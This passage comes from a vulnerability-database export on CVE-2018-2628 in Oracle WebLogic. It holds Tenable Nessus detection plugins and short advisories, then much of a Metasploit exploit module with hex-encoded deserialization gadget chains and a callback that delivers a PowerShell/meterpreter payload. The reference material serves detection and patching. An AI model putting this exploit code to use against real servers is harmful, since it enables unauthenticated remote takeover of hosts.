x6f\\x75\\x6e\\x74\\x5b\\x00\\x0b\\x65\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x44\\x61\\x74\\x61\\x74\\x00\\x13\\x5b\\x4c\\x6
a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00';\n\n\n# Object to be de-serialized:\n# sun.rmi.server.UnicastRef object with localhost:0 TCP endpoint\nauth_request += \n'\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x19\\x73\\x75\\x6e\\x2e\\x72\\x6d\\x69\\x2e' +\n'\\x73\\x65\\x72\\x76\\x65\\x72\\x2e\\x55\\x6e\\x69\\x63\\x61\\x73\\x74\\x52\\x65' +\n'\\x66\\x72\\x9b\\xa1\\xf1\\x9d\\x8f\\x4e\\x02\\x0c\\x00\\x00\\x78\\x70\\x77\\x26' +\n'\\x00\\x09\\x6c\\x6f\\x63\\x61\\x6c\\x68\\x6f\\x73\\x74\\x00\\x00\\x00\\x00\\x00' +\n'\\x00\\x00\\x00\\x64\\x86\\x26\\x2b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' +\n'\\x00\\x00\\x00\\x00\\x00\\x00\\x78';\n\nauth_request += '\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x25\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x49\\x6d\\x6d\\x75\\x74\\x61\\x62\\x6c\\x65\\x53\\x65\\x72\\x76\\x69\\x63\\x65\\x43\\x6f\\x6e\\x74\\x65\\x78\\x74\\xdd\\xcb\\xa8\\x70\\x63\\x86\\xf0\\xba\\x0c\\x00\\x00\\x78\\x72\\x00\\x29\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6d\\x69\\x2e\\x70\\x72\\x6f\\x76\\x69\\x64\\x65\\x72\\x2e\\x42\\x61\\x73\\x69\\x63\\x53\\x65\\x72\\x76\\x69\\x63\\x65\\x43\\x6f\\x6e\\x74\\x65\\x78\\x74\\xe4\\x63\\x22\\x36\\xc5\\xd4\\xa7\\x1e\\x0c\\x00\\x00\\x78\\x70\\x77\\x02\\x06\\x00\\x73\\x72\\x00\\x26\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6d\\x69\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x4d\\x65\\x74\\x68\\x6f\\x64\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x6f\\x72\\x12\\x48\\x5a\\x82\\x8a\\xf7\\xf6\\x7b\\x0c\\x00\\x00\\x78\\x70\\x77\\x34\\x00\\x2e\\x61\\x75\\x74\\x68\\x65\\x6e\\x74\\x69\\x63\\x61\\x74\\x65\\x28\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x73\\x65\\x63\\x75\\x72\\x69\\x74\\x79\\x2e\\x61\\x63\\x6c\\x2e\\x55\\x73\\x65\\x72\\x49\\x6e\\x66\\x6f\\x3b\\x29\\x00\\x00\\x00\\x1b\\x78\\x78\\xfe\\x00\\xff';\nsend_t3(sock:sock, data:auth_request);\nret = 
recv_t3(sock:sock);\nclose(sock);\n\nif (isnull(ret) || 'sun.rmi.server.UnicastRef cannot be cast to weblogic' >!< ret)\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname, version);\n}\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T04:58:06", "description": "The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities", "edition": 36, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-20T00:00:00", "title": "Oracle WebLogic Server Multiple Vulnerabilities (April 2018 CPU)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1768", "CVE-2017-5645", "CVE-2018-2628"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server", "cpe:/a:oracle:fusion_middleware"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_APR_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/109201", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109201);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2013-1768\", \"CVE-2017-5645\", \"CVE-2018-2628\");\n script_bugtraq_id(60534, 97702);\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (April 2018 CPU)\");\n script_summary(english:\"Checks for the patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities\");\n # 
https://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4e39ef65\");\n # https://www.tenable.com/blog/critical-oracle-weblogic-server-flaw-still-not-patched\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9cf2dde7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2018 Oracle\nCritical Patch Update advisory.\n\nNote that the patch for CVE-2018-2628 is reportedly incomplete.\nRefer to Oracle for any additional patch instructions or\nmitigation options.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-2628\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Server Deserialization RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"spad_log_func.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\nspad_log(message:\"checking version [\" + version + \"]\");\nif (version =~ \"^10\\.3\\.6\\.0\")\n{\n fix_ver = \"10.3.6.0.180417\";\n fix = make_list('GFWX', 'B47X'); # Smart Patch Update ID, only 10.3.6.0 has a smart patch update id\n}\nelse if (version =~ \"^12\\.1\\.3\\.0\")\n{\n fix_ver = \"12.1.3.0.180417\";\n fix = make_list(\"27419391\", \"27919943\");\n}\nelse if (version =~ \"^12\\.2\\.1\\.2\")\n{\n fix_ver = \"12.2.1.2.180417\";\n fix = make_list(\"27338939\",\"27741413\");\n}\nelse if (version =~ \"^12\\.2\\.1\\.3\")\n{\n fix_ver = \"12.2.1.3.180417\";\n fix = make_list(\"27342434\", \"27912627\");\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n\nspad_log(message:\"checking fix [\" + obj_rep(fix) + \"]\");\nPATCHED=FALSE;\n\n# Iterate over the list of patches and check the install for the patchID\nforeach id (fix)\n{\n spad_log(message:\"Checking fix id: [\" + id +\"]\");\n if (install[id])\n {\n PATCHED=TRUE;\n break;\n }\n}\n\nVULN=FALSE;\nif (ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n VULN=TRUE;\n\nif (PATCHED || !VULN)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n\nos = get_kb_item_or_exit(\"Host/OS\");\nif ('windows' >< 
tolower(os))\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n}\nelse port = 0;\n\nreport =\n '\\n Oracle Home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Fixes : ' + join(sep:\", \", fix);\n\nsecurity_report_v4(extra:report, severity:SECURITY_HOLE, port:port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2018-06-26T22:12:57", "description": "Oracle WebLogic Server has CVE-2018-2628 (CVSS Base Score: 9.8) \u2013 Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. The easily exploitable vulnerability allows an unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in the takeover of Oracle WebLogic Server.", "published": "2018-04-18T00:00:00", "type": "seebug", "title": "Weblogic\u53cd\u5e8f\u5217\u5316\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2018-2628)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2628"], "modified": "2018-04-18T00:00:00", "id": "SSV:97236", "href": "https://www.seebug.org/vuldb/ssvid-97236", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "myhack58": [{"lastseen": "2018-04-18T13:33:30", "bulletinFamily": "info", "cvelist": ["CVE-2018-2628"], "description": "Vulnerability/event summary \nBeijing Time 4 month 18 days morning, Oracle officially released 4 months a critical patch update CPU CriticalPatchUpdate,which contains a high risk of the Weblogic deserialization Vulnerability(CVE-2018-2628), by the vulnerability, the attacker may unauthorized remote code execution. The attacker only needs to send the carefully constructed T3 Protocol data, we can obtain the target server's permissions. 
An attacker can exploit the vulnerability Control component, the impact of data availability, confidentiality and integrity. \nThe level of risk \nSerious \nThe scope of the impact \nOracleWebLogicServer10. 3. 6. 0 \nOracleWebLogicServer12. 1. 3. 0 \nOracleWebLogicServer12. 2. 1. 2 \nOracleWebLogicServer12. 2. 1. 3 \nDisposal recommendations \nUpgrade Oracle201804 on patch \nReference \nhttp://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html \nhttp://toutiao.secjia.com/cve-2018-2628 \n\n", "edition": 1, "modified": "2018-04-18T00:00:00", "published": "2018-04-18T00:00:00", "id": "MYHACK58:62201890003", "href": "http://www.myhack58.com/Article/html/3/62/2018/90003.htm", "type": "myhack58", "title": "WebLogic WLS core components deserialization Vulnerability, CVE-2018-2628-a vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-08-12T02:14:54", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2018-08-11T00:00:00", "title": "Oracle Weblogic Server Deserialization Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2628"], "modified": "2018-08-11T00:00:00", "id": "1337DAY-ID-30868", "href": "https://0day.today/exploit/description/30868", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/exploit/powershell'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::Remote::TcpServer\r\n include Msf::Exploit::Powershell\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Oracle Weblogic Server Deserialization RCE',\r\n 'Description' => %q{\r\n An unauthenticated attacker with network access to the Oracle Weblogic\r\n Server T3 interface can send 
a serialized object to the interface to\r\n execute code on vulnerable hosts.\r\n },\r\n 'Author' =>\r\n [\r\n 'brianwrf', # EDB PoC\r\n 'Jacob Robles' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2018-2628'],\r\n ['EDB', '44553']\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => ['win']\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 7001\r\n },\r\n 'DisclosureDate' => 'Apr 17 2018'))\r\n end\r\n\r\n def gen_resp\r\n pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)\r\n pwrshl.gsub!(\"%COMSPEC%\", \"cmd.exe\")\r\n tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join\r\n\r\n mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')\r\n mycmd << tmp_dat\r\n\r\n # Response data taken from JRMPListener generated data:\r\n # java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe'\r\n # Modified captured network traffic bytes. 
Patch in command to run\r\n @resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'\r\n @resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'\r\n @resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'\r\n @resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'\r\n @resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'\r\n @resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'\r\n @resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'\r\n @resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'\r\n @resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'\r\n @resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'\r\n @resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'\r\n @resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'\r\n @resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'\r\n @resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'\r\n @resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'\r\n @resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'\r\n @resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'\r\n @resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'\r\n @resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'\r\n @resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'\r\n @resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'\r\n @resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'\r\n @resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'\r\n @resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'\r\n @resp << 
'6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'\r\n @resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'\r\n @resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'\r\n @resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'\r\n @resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'\r\n @resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'\r\n @resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'\r\n @resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'\r\n @resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'\r\n @resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'\r\n @resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'\r\n @resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'\r\n @resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'\r\n @resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'\r\n @resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'\r\n @resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'\r\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'\r\n @resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'\r\n @resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'\r\n @resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'\r\n @resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'\r\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'\r\n @resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'\r\n @resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'\r\n @resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'\r\n @resp << 
'6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'\r\n @resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'\r\n @resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'\r\n @resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'\r\n @resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'\r\n @resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'\r\n @resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'\r\n @resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'\r\n @resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'\r\n @resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'\r\n @resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'\r\n @resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'\r\n @resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'\r\n @resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'\r\n @resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'\r\n @resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'\r\n @resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'\r\n @resp << '673badd256e7e91d7b470200007078700000000174'\r\n\r\n @resp << mycmd\r\n\r\n @resp << '74'\r\n @resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'\r\n @resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'\r\n @resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'\r\n @resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'\r\n @resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'\r\n @resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'\r\n @resp << 
'76612e6c616e672e4f7665727269646500000000000000000000007078707100'\r\n @resp << '7e005a'\r\n end\r\n\r\n\r\n def on_client_connect(client)\r\n # Make sure to only sent one meterpreter payload to a host.\r\n # During testing the remote host called back up to 11 times\r\n # (or as long as the server was listening).\r\n vprint_status(\"Comparing host: #{client.peerhost}\")\r\n if @met_sent.include?(client.peerhost) then return end\r\n @met_sent << client.peerhost\r\n\r\n vprint_status(\"met_sent: #{@met_sent}\")\r\n\r\n # Response format determined by watching network traffic\r\n # generated by EDB PoC\r\n accept_conn = '4e00'\r\n raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join\r\n accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')\r\n accept_conn << raccept_conn\r\n accept_conn << '0000'\r\n accept_conn << client.peerport.to_s(16).rjust(4,'0')\r\n\r\n client.put([accept_conn].pack('H*'))\r\n client.put([@resp].pack('H*'))\r\n end\r\n\r\n def t3_handshake\r\n shake = '74332031322e322e310a41533a323535'\r\n shake << '0a484c3a31390a4d533a313030303030'\r\n shake << '30300a0a'\r\n\r\n sock.put([shake].pack('H*'))\r\n sleep(1)\r\n sock.get_once\r\n end\r\n\r\n def build_t3_request_object\r\n # data block is from EDB PoC\r\n data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'\r\n data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'\r\n data << '700000000a000000030000000000000006007070707070700000000a00000003'\r\n data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'\r\n data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'\r\n data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'\r\n data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'\r\n data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'\r\n data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'\r\n data << 
'4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'\r\n data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'\r\n data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'\r\n data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'\r\n data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'\r\n data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'\r\n data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'\r\n data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'\r\n data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'\r\n data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'\r\n data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'\r\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\r\n data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'\r\n data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'\r\n data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'\r\n data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'\r\n data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'\r\n data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'\r\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\r\n data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'\r\n data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'\r\n data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'\r\n data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'\r\n data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'\r\n data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'\r\n data << 
'00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'\r\n data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'\r\n data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'\r\n data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'\r\n data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'\r\n data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'\r\n data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'\r\n data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'\r\n data << '2d4147444d565155423154362e656883348cd6000000070000'\r\n\r\n data << rport.to_s(16).rjust(4, '0')\r\n\r\n data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'\r\n data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'\r\n data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'\r\n data << '863d1d0000000078'\r\n\r\n sock.put([data].pack('H*'))\r\n sleep(2)\r\n sock.get_once\r\n end\r\n\r\n def send_payload_objdata\r\n # JRMPClient2 payload generated from EDB PoC:\r\n # python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2\r\n # Patch in srvhost and srvport\r\n payload = '056508000000010000001b0000005d0101007372017870737202787000000000'\r\n payload << '00000000757203787000000000787400087765626c6f67696375720478700000'\r\n payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'\r\n payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'\r\n payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'\r\n payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'\r\n payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'\r\n payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'\r\n payload << 
'7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'\r\n payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'\r\n payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'\r\n payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'\r\n payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'\r\n payload << '78707702000078fe010000'\r\n\r\n # Data\r\n payload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e'\r\n payload << '416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50'\r\n payload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67'\r\n payload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200'\r\n payload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76'\r\n payload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176'\r\n payload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133'\r\n payload << '1e030000787077'\r\n\r\n unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join\r\n unicast_dat = '000a556e696361737452656600'\r\n unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')\r\n unicast_dat << unicast_srvhost\r\n unicast_dat << '0000'\r\n unicast_dat << srvport.to_s(16).rjust(4,'0')\r\n unicast_dat << '000000004e18654b000000000000000000000000000000'\r\n unicast_dat << '78'\r\n\r\n payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')\r\n payload << unicast_dat\r\n\r\n payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'\r\n payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'\r\n payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'\r\n payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'\r\n payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'\r\n payload << 
